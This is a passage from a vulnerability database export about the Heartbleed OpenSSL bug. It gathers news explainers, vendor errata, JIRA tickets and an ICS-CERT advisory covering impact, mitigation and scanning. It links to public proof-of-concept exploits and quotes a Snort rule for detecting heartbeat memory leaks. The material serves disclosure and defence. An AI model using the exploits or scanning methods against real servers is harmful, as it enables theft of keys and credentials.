attacks.\n\n \n\n\nAll versions of Android OS include outdated versions of OpenSSL library, but only Android 4.1.1 Jelly Bean has the vulnerable heartbeat feature enabled by default. Blackberry also [confirmed](<https://thehackernews.com/2014/04/billions-of-smartphone-users-affected_13.html>) that some of its products are vulnerable to Heartbleed bug, whereas Apple's iOS devices are not affected by OpenSSL flaw.\n\n \n\n\nGoogle had patched the affected version Android 4.1.1, but it will take long time to deliver updated Android version to the end Smartphone users as updates to majority handsets are controlled by phone manufacturers and wireless carriers. Until users running the affected versions are vulnerable to the attacks, and hackers will definitely take advantage of this public disclosure.\n\n \n\n\n**6.) WHAT ELSE COULD BE VULNERABLE TO HEARTBLEED?**\n\nIP phones, Routers, Medical devices, Smart TV sets, embedded devices and millions of other devices that rely on the OpenSSL to provide secure communications could also be vulnerable to Heartbleed bug, as it is not expected for these devices to get the updates soon from Google\u2019s Android partners.\n\n \n\n\nYesterday, Industrial Control Systems-CERT also [warned](<http://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-099-01B>) the critical infrastructure organizations (like energy, utilities or financial services companies) to beef-up their systems in order to defend against the Heartbleed attacks.\n\n \n\n\n**7.) WHO IS RESPONSIBLE FOR HEARTBLEED?**\n\nWe actually can't blame anyone developer, specially who are contributing to Open Source projects without money motivations. \n\n \n\n\nDr. Robin Seggelmann, a 31-year-old German developer who actually introduced the Heartbeat concept to OpenSSL on New Year's Eve, 2011, says it was just a programming error in the code that unintentionally created the \u201c_Heartbleed_\u201d vulnerability.\n\n \n\n\n\"_In one of the new features, unfortunately, I missed validating a variable containing a length_\", went undetected by the code reviewers and everyone else for over two years. He [claimed](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>) '_I did so unintentionally_'.\n\n \n\n\n**8.) WHO HAS EXPLOITED THIS BUG YET?**\n\nBloomberg accused the National Security Agency (NSA) of knowing the Heartbleed bug for the last two years. Not even this, the report says the agency was using it continuously to gain information instead of disclosing it to the OpenSSL developers. But if it is so, then this would be one of the biggest developments in the history of wiretapping ever. However, the agency [denied](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>) it saying NSA was not aware of Heartbleed until it was made public.\n\n \n\n\nBut when it comes to exploit any known vulnerability, then Hackers are most likely to be top on the list. As the flaw was so widely spread that it affected half a million websites worldwide, so after the public disclosure, the cybercriminals could reach the sites to steal credentials, passwords and other data, before the site operators apply the freely available patch.\n\n \n\n\nThere are multiple Proof-of-concept exploits available for the Heartbleed flaw:\n\n * [Python Script](<https://gist.github.com/mpdavis/10171593>)\n * [Metasploit Module](<https://github.com/rapid7/metasploit-framework/pull/3206/files>)\n * [C Code](<https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c>)\n * [NMAP script](<https://github.com/sensepost/heartbleed-poc>)\n * [Python Script by Rahul Sasi](<https://bitbucket.org/fb1h2s/cve-2014-0160/src/2b1fff1a62e29397ff60586557c96989c7b64662/Heartbeat_scanner.py?at=master>)\n\n**9.) CHANGING ACCOUNT PASSWORDS CAN SOLVE THE ISSUE?**\n\nNot exactly, as Heartbleed attack has the ability to leak anything from the server including your passwords, credit card details or any kind of personal information. But, in order to protect your online accounts you should at least change your passwords immediately for the sites that resolved the issue and for the sites not affected by the bug as well, just to make sure that you are safe.\n\n \n\n\nFirst of all check if the sites you use every day on an individual basis are vulnerable to Heartbleed bug or not using following services or apps:, and if you're given a red flag, avoid the site for now.\n\n * [http://filippo.io/Heartbleed/](<https://filippo.io/Heartbleed/>)\n * [Provensec Scanner](<http://provensec.com/heartbleed/>)\n * [GlobalSign SSL Configuration Checker](<https://sslcheck.globalsign.com/>)\n * [ADTsys Checker](<http://seguranca.adtsys.com.br/>)\n * The easiest way to keep you safe is to use a new add-on to the Chrome browser, [Chromebleed](<https://chrome.google.com/webstore/detail/chromebleed/eeoekjnjgppnaegdjbcafdggilajhpic>), created by security researcher, Jamie Hoyle.\n * To check whether your Android devices are safe or not, you can install the [Bluebox Heartbleed Scanner](<https://play.google.com/store/apps/details?id=com.bblabs.heartbleedscanner>) available on the Google Play Store. The Bluebox Heartbleed Scanner looks for apps installed on your device that have bundled their own version of OpenSSL and the scanner also checks the version of the library and whether heartbeat is enabled or not.\n\nWell, nobody is sure at this point, because Heartbleed is stealthy as it leaves no traces behind and here the matter goes worse.\n\n \n\n\nYou may never know if you have been hacked using the flaw or not. This means that there is no way to tell if your information was stolen previously from a site or a service that has now fixed it.\n\n \n\n\nBut if you haven't change the password to the popular sites yet, then yes, your password and financial information are still widely open to cybercriminals and other spying agencies.\n\n \n\n\n**10.) WHAT SHOULD I DO TO PROTECT MYSELF?**\n\nFirst of all DON'T PANIC. You have to change your password everywhere, assuming that it was all vulnerable before, just to make sure that you are now safe. But hold on... If some sites are still affected by the flaw then your every effort is useless, as it\u2019s up to the site to first fix the vulnerability as soon as possible , because changing the password before the bug is fixed could compromise your new password as well. \n \nIf you own a vulnerable SSL Service, then you are recommended to: \n\n\n * Upgrade the OpenSSL version to [1.0.1g](<https://www.openssl.org/source/>)\n * Request revocation of the current SSL certificate\n * Regenerate your private key\n * Request and replace the SSL certificate\n\nDon't reuse any old passwords and it is good practice to use two-factor authentication, which means with the password, the account requires a freshly generated pass code that shows up only on your personal smartphone, before getting into certain sites. \n \nStay Safe! \n\n\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n * [NSA denies Report that Agency knew and exploited Heartbleed Vulnerability](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>)\n", "modified": "2014-04-17T10:28:24", "published": "2014-04-14T20:40:00", "id": "THN:244769C413FFA5BE647D8F6F93431B74", "href": "https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html", "type": "thn", "title": "HeartBleed Bug Explained - 10 Most Frequently Asked Questions", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:17:12", "bulletinFamily": "info", "description": "[](<https://4.bp.blogspot.com/-Q0TNjq7Fcx8/U0riot0TcrI/AAAAAAAAbMs/99nvaMv2pwQ/s1600/Android-blackberry-apple-iphone-heartbleed.jpg>)\n\n[Heartbleed](<https://thehackernews.com/search/label/Heartbleed%20bug>) has left a worst impression worldwide affecting millions of websites and is also supposed to put millions of Smartphones and tablets users at a great risk.\n\n \n\n\nHeartbleed is a critical bug (_[CVE-2014-0160](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)_) in the popular OpenSSL cryptographic software library, that actually resides in the OpenSSL's implementation of the TLS/DTLS heartbeat extension, which allows attackers to read portions of the affected server\u2019s memory, potentially revealing users data such as usernames, passwords, and credit card numbers, that the server did not intend to reveal.\n\n \n\n\n[OpenSSL](<https://thehackernews.com/search/label/OpenSSL>) is a widely-used cryptographic library which implements the SSL and TLS protocol and protects communications on the Internet, and mostly every websites use either SSL or TLS, even the Apache web server that powers almost half of the websites over internet utilizes OpenSSL.\n\n \n\n\nBut to assume that the users using desktop browsers to visit websites are vulnerable to the Heartbleed bug, will be wrong. Despite 40-60 billion active Smartphone applications may be sharing some of those same servers or connect to their own group of servers that may also be compromised.\n\n \n\n\n**ANDROID**\n\nGoogle wrote in an update on its Online Security [blog](<https://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html>) on Wednesday, emphasizing that Android was not vulnerable to the Heartbleed bug, except for a very specific version and can you guess that so called specific version??\n\n \n\n\n[Android](<https://thehackernews.com/search/label/Android>) 4.1.1 Jelly Bean, the one which makes up the majority of Android devices around the world, and which relies on the vulnerable version of OpenSSL.\n\n \n\n\nGoogle didn\u2019t reveal the actual figure that are vulnerable to the bug, but according to the latest [dashboard ](<https://developer.android.com/about/dashboards/index.html?utm_source=ausdroid.net>)released by Google, it is estimated that around 34.4% of the Android devices in use today are running the Android 4.1.x version. \n\n \n\n\nEven last September Google announced that it had activated one billion devices. This means that the minimal number is likely to be in the millions. So, one can imagine how many Smartphones and tablets were at risk.\n\n \n\n\nWell, Google has released the patches for Android 4.1.1 which is being distributed among the Android partners.\n\n \n\n\n**APPLE**\n\n[Apple](<https://thehackernews.com/search/label/Apple>) users can be relaxed knowing that their devices running iOS and OS X are not affected by the most critical security flaw, Heartbleed.\n\n \n\n\n\"_Apple takes security very seriously. IOS and OS X never incorporated the vulnerable software and key web-based services were not affected_,\" Apple told [Re/code](<http://recode.net/2014/04/10/apple-says-ios-osx-and-key-web-services-not-affected-by-heartbleed-security-flaw/>).\n\n \n\n\nInstead using OpenSSL, Apple relies on different SSL/TLS libraries called Secure Transport, which was hit by its own very serious bug in February outcropping the possibility for [man-in-the-middle (MitM) attacks](<https://thehackernews.com/2014/02/apples-ssl-vulnerability-may-allowed.html>) \u2014 though it wasn't as dangerous as the recent OpenSSL Heartbleed security Flaw.\n\n \n\n\nBut still Apple users were not exempted completely, as the users using BBM for private messages on iOS might have been vulnerable to this flaw.\n\n \n\n\n**BLACKBERRY**\n\nBlackberry [confirmed](<http://btsc.webapps.blackberry.com/btsc/viewdocument.do?externalId=KB35882&sliceId=1&cmd=displayKC&docType=kc&noCount=true&ViewedDocsListHelper=com.kanisa.apps.common.BaseViewedDocsListHelperImpl>) that some of its products, including Secure Work Space for iOS and Android, and BlackBerry Link for Windows and Mac OS and even BBM for iOS and Android were vulnerable to the Heartbleed security flaw. The figure of affected users is not least, as about 80 million people use BBM service.\n\n \n\n\nThey have also assured that BlackBerry Smartphones and tablets, BlackBerry Enterprise Server 5, BlackBerry Enterprise Service 10, and the BlackBerry Infrastructure are not affected by the flaw and are fully protected.\n\n \n\n\n**Related Important Articles:**\n\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n * [NSA denies Report that Agency knew and exploited Heartbleed Vulnerability](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>)\n", "modified": "2014-04-13T19:32:50", "published": "2014-04-13T08:19:00", "id": "THN:4868B616BCBA555DA2446F6F0EA837B0", "href": "https://thehackernews.com/2014/04/billions-of-smartphone-users-affected_13.html", "type": "thn", "title": "Billions of Smartphone Users affected by Heartbleed Vulnerability", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:18:11", "bulletinFamily": "info", "description": "[](<https://3.bp.blogspot.com/-PsXPunZKgEw/U0bcA1AOL-I/AAAAAAAAAL0/PLT1hx4fDZw/s1600/Heartbleed-bug-Exposes-Passwords.png>)\n\nAre you safe from the critical bug Heartbleed?? OpenSSL- the encryption technology used by millions of websites to encrypt the communication and is also used to protect our sensitive data such as e-mails, passwords or banking information. \n\n \n\n\nBut a tiny, but most critical flaw called \"[_Heartbleed_](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\" in the widely used OpenSSL opened doors for the cyber criminals to extract sensitive data from the system memory.\n\n** \n**\n\n**WHAT IS HEARTBLEED?**\n\nSSL and TLS are known to provide communication security and privacy over the Internet for applications such as websites, email, instant messaging (IM), including some virtual private networks (VPNs).\n\n \n\n\nHeartbleed is a critical bug (**[CVE-2014-0160](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)**) is in the popular OpenSSL cryptographic software library, that actually resides in the OpenSSL's implementation of the TLS (transport layer security protocols) and DTLS (_Datagram TLS_) heartbeat extension (RFC6520).\n\n \n\n\nThis bug was independently discovered by a team of security engineers (Riku, Antti and Matti) at _Codenomicon_, while improving the SafeGuard feature in Codenomicon's Defensics security testing tools, and Neel Mehta of Google Security, who first reported it to the OpenSSL team.\n\n \n\n\nSoftware vulnerabilities may come and go, but this bug is more critical as it has left the large number of private keys and other secrets exposed to the Internet. The heartbleed bug can reveal the contents of a server's memory, where the most sensitive data is stored, including the private data such as usernames, passwords, and credit card numbers. \n\n \n\n\nThis could allow attackers to retrieve private keys and ultimately decrypt the server's encrypted traffic or even impersonate the server.\n\n> \u201c_The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users_.\u201d\n\n**HEARTBLEED WORLDWIDE ****IMPACT**\n\nOpenSSL is most widely used cryptographic library for Apache and nginx Web servers, which handles a service of Transport Layer Security (TLS) called **Heartbeat**, an extension added to TLS in 2012. The combined market share of just those two, Apache and nginx, out of the active sites on the Internet is over 66% according to Netcraft's April 2014 Web Server Survey.\n\n \n\n\nMoreover, OpenSSL is used to protect email servers (SMTP, POP and IMAP protocols), chat servers (XMPP protocol), virtual private networks (SSL VPNs), network appliances and wide variety of client side software. Many large consumer sites are also saved by their conservative choice of SSL/TLS termination equipment and software. OpenSSL is also very popular in client software and somewhat popular in networked appliances which have most inertia in getting updates. \n \nSecurity researcher _'Robert Graham_' [scanned the Internet](<http://blog.erratasec.com/2014/04/600000-servers-vulnerable-to-heartbleed.html#.U0bKFfnlbGw>) and found that more than 600,000 servers are vulnerable to heartbleed flaw, including Yahoo.com, imgur.com, flickr.com, hidemyass.com. [[List](<https://github.com/musalbas/heartbleed-masstest/blob/master/top1000.txt>)]\n\n \n\n\nBecause of Heartbleed bug, the Canada Revenue Agency was forced to shut down its electronic tax collection service yesterday and apparently, World's biggest audio platform SoundCloud also logged out its users for fixing this flaw.\n\n[](<https://4.bp.blogspot.com/-ZjFqjwDfyfs/U0bGT6lMcEI/AAAAAAAAbIc/HdTKJsQUB3U/s1600/soundcloud.png>)\n\nYahoo, which has more than 800 million users around the world, also has been [exposed](<https://twitter.com/markloman/status/453502888447586304/photo/1>) by the bug. \n\n\n[](<https://1.bp.blogspot.com/-C1vFJyYZ5Ig/U0bIgPoTloI/AAAAAAAAbIo/EjLY1KOHb9w/s1600/yahoo-password-cracking.png>)\n\n** \n** **HOW HEARTBLEED WORKS?**\n\nIt is not a problem with the TLS/SSL technologies that encrypt the Internet, neither with how OpenSSL works. It is just a dumb coding mistake. \n \nUsing Heartbeats extension two computers make sure the other is still alive by sending data back and forth to each other. The client (user) sends its heartbeat to the server (website), and the server hands it right back. If by chance anyone of them goes down during the transaction, the other one will know using heartbeat sync mechanism. \n \nWhen that heartbeat is sent, a small amount of the server\u2019s short-term memory of about 64 kilobytes comes in reply from server and an attacker is supposed to grab it, that can leak sensitive data such as message contents, user credentials, session keys and server private keys. By sending heartbleed requests multiple times, an attacker is able to fetch more memory contents from the server.\n\n \n\n\nThis means, everything and anything in the memory such as SSL private keys, user keys used for your usernames and passwords, instant messages, emails and business critical documents and communication, and many more is vulnerable to cyber criminals. At this phase, you have to assume that it is all compromised. \n \nAbout two-thirds of web servers rely on OpenSSL, means the information passing through hundreds of thousands of websites could be vulnerable. \n \nSo far, Security experts have found no direct evidence that anyone has managed to use the bug to steal information. The vulnerability has been fixed in OpenSSL v1.0.1g. \n \nMajor websites, including Gmail and YouTube, Facebook, Tumblr, Yahoo and Dropbox have fixed the problem, but there are still thousands of websites who are yet to fix the problem. Users are advised to change their passwords on only those affected websites, that tell you they've fixed the problem. **[READ MORE](<https://thehackernews.com/2014/04/how-to-protect-yourself-from-heartbleed_10.html>) on how to protect yourself from Heartbleed bug**. \n \n**Related Important Articles:** \n \n \n \n \n\n\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n", "modified": "2014-04-12T09:00:54", "published": "2014-04-10T07:00:00", "id": "THN:8D999AEE5218AD3BFA68E5ACE101F201", "href": "https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html", "type": "thn", "title": "How Heartbleed Bug Exposes Your Passwords to Hackers", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:30", "bulletinFamily": "unix", "description": "[1.0.1e-16.7]\n- fix CVE-2014-0160 - information disclosure in TLS heartbeat extension", "modified": "2014-04-07T00:00:00", "published": "2014-04-07T00:00:00", "id": "ELSA-2014-0376", "href": "http://linux.oracle.com/errata/ELSA-2014-0376.html", "title": "openssl security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "atlassian": [{"lastseen": "2019-05-29T17:29:00", "bulletinFamily": "software", "description": "{panel:bgColor=#e7f4fa}\n *NOTE:* This suggestion is for *JIRA Server*. Using *JIRA Cloud*? [See the corresponding suggestion|http://jira.atlassian.com/browse/JRACLOUD-38927].\n {panel}\n\n\r\n{quote}\r\n7 new vulnerabilities were announced for OpenSSL on 5 June 2014. These vulnerabilities affect Tomcat Native, which ships with the Windows Installer versions of JIRA.\r\n\r\nSo please update your JIRA Windows Installers to include a patched version of Tomcat Native DLL's, once these become available.\r\n{quote}\r\n\r\n*Note*\r\nThis is related to the Heartbleed vulnerability. Does not affect JIRA if recommended configuration is followed http://blogs.atlassian.com/2014/04/openssl-cve-2014-0160-atlassian/", "modified": "2018-02-08T06:54:15", "published": "2014-06-26T19:39:26", "id": "ATLASSIAN:JRASERVER-38927", "href": "https://jira.atlassian.com/browse/JRASERVER-38927", "title": "Update Tomcat Native DLL in JIRA Installer", "type": "atlassian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T17:29:03", "bulletinFamily": "software", "description": "{panel:bgColor=#e7f4fa}\n *NOTE:* This suggestion is for *JIRA Cloud*. Using *JIRA Server*? [See the corresponding suggestion|http://jira.atlassian.com/browse/JRASERVER-38927].\n {panel}\n\n\n{quote}\n7 new vulnerabilities were announced for OpenSSL on 5 June 2014. These vulnerabilities affect Tomcat Native, which ships with the Windows Installer versions of JIRA.\n\nSo please update your JIRA Windows Installers to include a patched version of Tomcat Native DLL's, once these become available.\n{quote}\n\n*Note*\nThis is related to the Heartbleed vulnerability. Does not affect JIRA if recommended configuration is followed http://blogs.atlassian.com/2014/04/openssl-cve-2014-0160-atlassian/", "modified": "2019-04-16T03:53:37", "published": "2014-06-26T19:39:26", "id": "ATLASSIAN:JRACLOUD-38927", "href": "https://jira.atlassian.com/browse/JRACLOUD-38927", "title": "Update Tomcat Native DLL in JIRA Installer", "type": "atlassian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "ics": [{"lastseen": "2019-10-23T22:47:51", "bulletinFamily": "info", "description": "## OVERVIEW\n\nThis advisory is a follow-up to the updated alert titled ICS-ALERT-14-099-01E Situational Awareness Alert for OpenSSL Vulnerability that was published April 29, 2014, on the NCCIC/ICS-CERT web site.\n\nThe OpenSSL (Heartbleed) vulnerability was independently identified by both Neel Mehta of Google Security on April 1, 2014, and 2 days later by a team of security engineers Riku, Antti, and Matti at Codenomicon.a b The OpenSSL (Heartbleed) vulnerability has been identified in OpenSSL Versions 1.0.1 through 1.0.1f and 1.0.2-beta1 that contain a flaw in the implementation of the transport layer security/datagram transport layer security (TLS/DTLS) heartbeat functionality. OpenSSL Version 1.0.1g addresses and mitigates this vulnerability.\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nThe following OpenSSL libraries are affected:\n\n * OpenSSL Versions 1.0.1 through 1.0.1f and 1.0.2-beta1\n\nICS-CERT has produced an OpenSSL affected/unaffected products list that specifies which vendors, products, and product versions are affected by the OpenSSL vulnerability. This document also contains a list of vendors, products, and product versions that has evaluated their products and have asserted that their products are not affected by the OpenSSL vulnerability. This document will be updated as needed. The location of this document is as follows:\n\nhttps://ics-cert.us-cert.gov/file_attach/ICSA-14-135-05.xlsx\n\n## IMPACT\n\nA missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64 kB of memory on a connected device. An attacker who successfully exploits this vulnerability may obtain the user credentials and cryptographic keys used to access the device.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nThe OpenSSL Project is an ongoing volunteer-driven collaborative multinational development effort for the [Open Source](<http://www.opensource.org/>) toolkit, implementing the s[ecure sockets layer](<http://www.netscape.com/eng/ssl3/>) (SSL) and TLS protocols, as well as a general purpose cryptography library. The Open Source toolkit is known to be deployed in some secure communication devices used in ICS networks.\n\nThe ideal ICS network is isolated from the enterprise network and contains little to no external communication connections; however, business demands are requiring increased communication with the ICS network from external networks. These external communication connections are susceptible to the OpenSSL vulnerability, which could be used to exfiltrate credentials for access to components on the ICS network. The OpenSSL vulnerability can be present in hosts, clients, and client software. If ICS network credentials are exfiltrated, which can be done with the successful exploitation of the OpenSSL vulnerability, it is possible for an attacker to exercise substantial control over an ICS network. It is extremely common for a set of ICS credentials to have nearly unlimited access throughout the ICS network, which is different from IT networks that typically limit user access to execute job specific duties.\n\nExternal connections commonly used in the ICS network include VPN connections, database and web interfaces, and secure FTP and other secure data transfer connections. There are three general guidelines that can be applied to determine a starting point for evaluating ICS networks for the OpenSSL vulnerability:\n\n 1. Any component connected to the ICS network that offers secure external communication should be evaluated;\n 2. Any component connected to the ICS network that was deployed or last updated prior to 2012 will not have the OpenSSL vulnerability because the OpenSSL vulnerability did not exist prior to 2012; and\n 3. Any component connected to the ICS network that is based on Microsoft technologies may not be vulnerable because Microsoft does not typically use OpenSSL.\n\nSpecific types of networking equipment have been determined to be more likely to contain the OpenSSL vulnerability and they are as follows:\n\n * Network gear that is managed;\n * Communication gear that encrypts;\n * PLCs with built in Ethernet/web cards with secure web connections;\n * PLCs with add-on Ethernet/web cards with secure web connections;\n * Database and web interfaces to customers, vendors, and enterprise resource planning interfaces;\n * Secure data transfer servers; and\n * Virtual private network connections directly into ICS networks or routed through the enterprise firewalls into ICS networks.\n\nAsset owners and operators that are unsure of the vulnerability of ICS networking equipment or if they suspect networking equipment of containing the OpenSSL vulnerability, should contact their product vendor.\n\nICS-CERT is tracking products affected by the OpenSSL vulnerability in the OpenSSL affected/unaffected products list. In regards to the products ICS-CERT is currently working with, the ratio of affected products to products not affected is small; however, the OpenSSL vulnerability is known to affect a large number of traditional IT-based secure communication equipment. The OpenSSL toolkit is deployed globally.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### OUT OF BOUNDS READc\n\nA flaw in the implementation of OpenSSL could allow the private key used in SSL to be exposed. An attacker could then decrypt and read any secure data passed on the network link.\n\nThe vulnerability exists in the Heartbeat extension (RFC6520) of OpenSSL\u2019s TLS and the DTLS protocols. The Heartbeat extension is functionally a \u201ckeep-alive\u201d between end-users and the secure server. It works by sending periodic \u201cdata pulses\u201d of 64 KB in size to the secure server, and once the server receives that data; it reciprocates by resending the same data at the same size.d\n\nThe out-of-bounds \u201cread\u201d vulnerability exists because the Heartbeat extension does not properly validate the data being sent from the end-user. As a result, a malicious actor could send a specially crafted Heartbeat request to the vulnerable server and obtain sensitive information stored in memory on the server. Furthermore, even though each heartbeat only allows requests to have a data size limited to 64 kB segments, it is possible to send repeated requests to retrieve more 64 kB segments, which could include encryption keys used for certificates, passwords, usernames, and even sensitive content that were stored at the time. An attacker could harvest enough data from the 64 kB segments to piece together larger groupings of information, which could help an attacker develop a broader understanding of the information being acquired.e\n\nCVE-2014-0160f has been assigned. A CVSS score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).g\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill level would be able to exploit this vulnerability with publicly available information, tutorials, and exploit tools.\n\n## MITIGATION\n\nOpenSSL Version 1.0.1g has addressed and mitigates this vulnerability. Asset owners and operators should contact their product vendor to check for availability of updates. Any system that may be affected by this vulnerability should regenerate any credential information (secret keys, passwords, etc.) with the assumption that an attacker has already used this vulnerability to obtain those items.\n\nOlder versions of OpenSSL may not be vulnerable to the Heartbleed attacks, but have other known vulnerabilities that could be exploited. ICS-CERT strongly suggests that asset owners and operators verify what versions are running in the products being used in their facilities and then reference the following web site to determine which patched versions of OpenSSL should be used for the most secure operation. If there are still questions about what version is being used, contact the product vendor for verification.\n\n<http://www.openssl.org/news/vulnerabilities.html>\n\n## DEVELOPERS\n\nUpgrade affected TLS/TDLS clients and servers to OpenSSL Version 1.0.1g. Alternatively, affected versions of OpenSSL may be recompiled with the option \n\u201c-DOPENSSL_NO_HEARTBEATS\u201d to mitigate the vulnerability until an upgrade can be performed.\n\n## OPENSSL SCANNING IN ICS ENVIRONMENTS\n\nAsset owners and operators may need to scan the devices used in their ICS environment if they implement end-of-life devices or their vendor is not communicating with them on this issue. Scanning can be completed in two different ways, active and passive scanning. Both scanning methods are dangerous when used in an ICS environment due to the sensitive nature of these devices. ICS-CERT advises that all scanning of ICS devices for Heartbleed be done in an isolated test laboratory, not in the production environment. If a test environment is not available then the device vendor should be contacted. When it is possible to scan the device, it is possible that device could be put into invalid state causing unexpected results and possible failure of safety safeguards.\n\nScanning of the VPN used to connect into ICS environments should be the highest priority. If a VPN is vulnerable to Heartbleed, it is possible for an attacker to retrieve the information required to hijack a current user\u2019s session and circumvent any form of authentication used by the VPN, including two-factor authentication.\n\nActively attempting to exploit the OpenSSL vulnerability is the quickest and most reliable method for identifying vulnerable systems, but it is also the most dangerous method of scanning. Multiple tools and scripts have been written to only request 16 kB and to check if a longer than normal Heartbeat request is returned. There are numerous OpenSSL scanning tools available and three free to use active-scanning tools that accurately identify the presence of the OpenSSL vulnerability include: CrowdStrike Heartbleed Scanner, Nmap NSE Script for Heartbleed, and Heartbleed-POC.py.\n\nThe CrowdStrike Heartbleed Scanner (<http://www.crowdstrike.com/community-tools/index.html>) is a Windows application that scans multiple hosts concurrently and provides a clear vulnerable/not-vulnerable indicator for each host scanned. An Nmap NSE Script for Heartbleed is available for Windows, OS X, and Linux/Unix (ICS-CERT has only tested the script on Linux) allowing for testing a large number of hosts at once. Finally, an open source python script called \u201cHeartbleed-POC.py\u201d provides a method of scanning a single host. The latter two scripts can be found at (<https://github.com/sensepost/heartbleed-poc>).\n\nA lower-risk method is passively scanning for devices that are susceptible to this attack. This approach could involve submitting devices\u2019 firmware and SSL applications to online code scanners or capturing and analyzing network traffic. Codenomicon released a web application that will scan small firmware updates or applications to determine if a vulnerable version of OpenSSL is used. This is the only method known to be safe for ICS environments but requires knowledge of the firmware version used on all devices and the ability to download those versions from vendors.\n\nUncovering the existence of the OpenSSL vulnerability is difficult through network monitoring unless it can be determined that a device or application is being actively exploited. To make this effort even more difficult, researchers have suggested some methods to obfuscate attack traffic. Considering these challenges, a few criteria can be used to possibly determine if a host is likely vulnerable. Unfortunately, this cannot be used to ascertain if the host is not vulnerable unless it was produced or last updated before March 2012. The criteria are as follows:\n\n * Host is using OpenSSL (unknown version);\n * No patching has been done since April 4th;\n * Host has been produced or updated since March 2012; and\n * Heartbeat extension is supported (packet filters can be used to detect heartbeat messages).\n\nIt should also be noted that capturing network traffic from an ICS environment can cause increases in network delays that may result in process malfunction.\n\n## DETECTION SIGNATURES\n\nContact equipment vendors for specific mitigation information as the implementations may vary. In addition, IDS signatures are available that may provide awareness of an attack of this nature occurring. An example of these rule sets can be found hereh:\n\nalert tcp any [!80,!445] -> any [!80,!445] (msg:\"FOX-SRT - Suspicious - SSLv3 Large Heartbeat Response\"; flow:established,to_client; content:\"|18 03 00|\"; depth: 3; byte_test:2, >, 200, 3, big; byte_test:2, <, 16385, 3, big; threshold:type limit, track by_src, count 1, seconds 600; reference:cve,2014-0160; classtype:bad-unknown; sid: 1000000; rev:4;)\n\nAdditional Snort signatures have been provided by the FBI, Mitigation against Open Secure Socket Layer Heartbeat Extension Vulnerability, at:\n\nhttp://ics-cert.us-cert.gov/sites/default/files/documents/FBI%20Private%20Industry%20Notice-140416-002.pdf\n\nSnort community rules can be found at:\n\n<http://www.snort.org/snort-rules/#community>.\n\nAdditional indicators of compromise are available on the Control Systems compartment of the US-CERT secure portal for owners and operators of critical infrastructure. ICS-CERT encourages U.S. asset owners and operators to join the Control Systems compartment of the US\u2011CERT secure portal. Send your name, email 